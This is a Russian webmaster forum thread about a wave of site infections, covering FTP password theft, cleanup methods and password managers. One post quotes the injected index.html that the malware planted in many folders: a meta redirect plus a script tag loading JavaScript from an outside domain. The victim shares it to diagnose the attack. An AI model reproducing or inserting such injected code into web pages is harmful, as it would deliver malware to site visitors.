Массовый взлом и заражение сайтов

Badmaestro
На сайте с 11.07.2008
Offline
258
#71

Интересно, есть ли какие-то антивирусы для сайтов? У самого разные сайты ловили вирусняк, что приводило к дикому геморрою, чистке по фтп и даже потере позиций в выдаче (слава Богу, без АГС обходилось).

SEO без воды ( https://kupit-slona.ru ) Продвижение сайтов ( https://searchengines.guru/ru/forum/1038146 ) Аренда грузинского Adsense ( при доходе от 1000$ в мес. Adsense активирован, выплаты идут. )
R
На сайте с 24.01.2008
Offline
180
#72
Badmaestro:
Интересно, есть ли какие-то антивирусы для сайтов? У самого разные сайты ловили вирусняк, что приводило к дикому геморрою, чистке по фтп и даже потере позиций в выдаче (слава Богу, без АГС обходилось).

Если даже есть, то они ни как не смогут определить точное местонахождение вируса, т.е. он может прописываться в системных файлах, а они не доступны дял сканирования.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Badmaestro
На сайте с 11.07.2008
Offline
258
#73
Rxp:
Если даже есть, то они ни как не смогут определить точное местонахождение вируса, т.е. он может прописываться в системных файлах, а они не доступны дял сканирования.

Интересно, каким образом тогда опытные борцы с вирусняком убивают заразу? Просто бродя по фтп в поисках подозрительных файлов с последующим удалением этих файлов?

mymind
На сайте с 07.09.2004
Offline
188
#74
Ziller:
В Total Commander начиная с 7й версии абсолютно безопасно хранить пароли. Теперь там реализован мастер-пароль и пароли намертво шифруются AES-256.

При создании соединения есть же флажок "Использовать главный пароль для защиты пароля". Есть и кнопочка "Шифрование".

Но нет, я постоянно вижу стоны что в Тотале хранить пароли нельзя. Ну глазики разуйте уже и найдите эти кнопки.

Если можно уточните поточнее. У меня Total 7.04 и сколько не разувал глазики, не увидел то, о чём вы тут пишите. Зато про пароли он меня заранее предупреждает. Что небезопасно.

jpg totalcmdwin.jpg
KG
На сайте с 06.10.2010
Offline
11
#75

7 августа заразились сайт на joomla,пароли хранил в filezilla. Востановил через бек-ап. Сегодня грохнуло другой старый сайт,про каторый я забыл. Бекапа нет. Пытасюь очистить руками....помогите кто может.

Апокалипсис
На сайте с 02.11.2008
Offline
391
#76

Что то мне кажется, что инъекция - еще и не с помощью ФТП идет.

У себя в вордпрессе нашел зашифрованный на 100 рядов base64 - кодировкой скрипт. Удалил, не стал дешифровать.

Записки нищего (http://zapiskinishego.ru) - мой личный блог Услуги php программиста. Очень нужна любая работа. Не покупают? Поведенческий аудит интернет-магазина за 5000 руб. (/ru/forum/990312)
Y7
На сайте с 17.05.2005
Offline
146
#77
Kirill_GOLD:
7 августа заразились сайт на joomla,пароли хранил в filezilla. Востановил через бек-ап. Сегодня грохнуло другой старый сайт,про каторый я забыл. Бекапа нет. Пытасюь очистить руками....помогите кто может.

Делал так:

1. Закачал все файлы с сайта на локальный комп.

2. Поиск/замена - удалил ненужный код.

3. залил все обратно.

Ну и конечно, нужно, менять пароль

KG
На сайте с 06.10.2010
Offline
11
#78

Па моему никто не сказал, я заметил что эта шняга еще почти в каждой папке создает свой html.

Название файлов index.html - обнаружил около 500 файлов содержание ниже

<html>

<head><meta http-equiv="refresh" content="0;URL=../"><head>

<body bgcolor="#FFFFFF"><script src="http://byhosted.com/ajaxengine.js"></script></body></html>

+ Еще в конфигах прописывается...

Partneroff
На сайте с 04.02.2009
Offline
14
#79

По моему мнению, происходит всегда по-разному, бывает что троян пропускается антивирусом и отсылает данные. Хотя обычно хороший фаервол в режиме обучения ловит несанкционированное открытие портов и сообщает об этом.

А бывает так, что на шаред хостинге заражается один сайт, а через него заражаются другие, это когда админ хостинг провайдера не следит за безопасностью и установленными квотами.

Для себя решил не экономить на защите и использовать для хранения паролей Kaspersky Password Manager , по крайней мере НЕ позволяет делать снимки экрана, фиксировать нажатия и т.д и т.п , может подставлять на уровне API данные и не позволять сохранять их программам и шпионам. ;)

В сравнении с другими мэнеджерами паролей намного надёжнее.

Верить значит жить. ;-|
KG
На сайте с 06.10.2010
Offline
11
#80

Тема гонится третий день. Одни предположения. Как только кто-то узнает что-то ценное. скажите...Уж очень интересно что это за проделки такие...

Kirill_GOLD добавил 30.08.2011 в 14:35

Провел некое иследование, штука очень странная. Я даже сомневаюсь в том на что все грешат....Я хранил пароли от сайтов только в файл зиле. Там было около 7 сайтов. 7 авгутса повредилось два...пароли я не поменял...11 го порведился еще один. Щас пароли сменил...тьфу тьфу тихо. Вопрос, почему не все сайты ? а частями?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий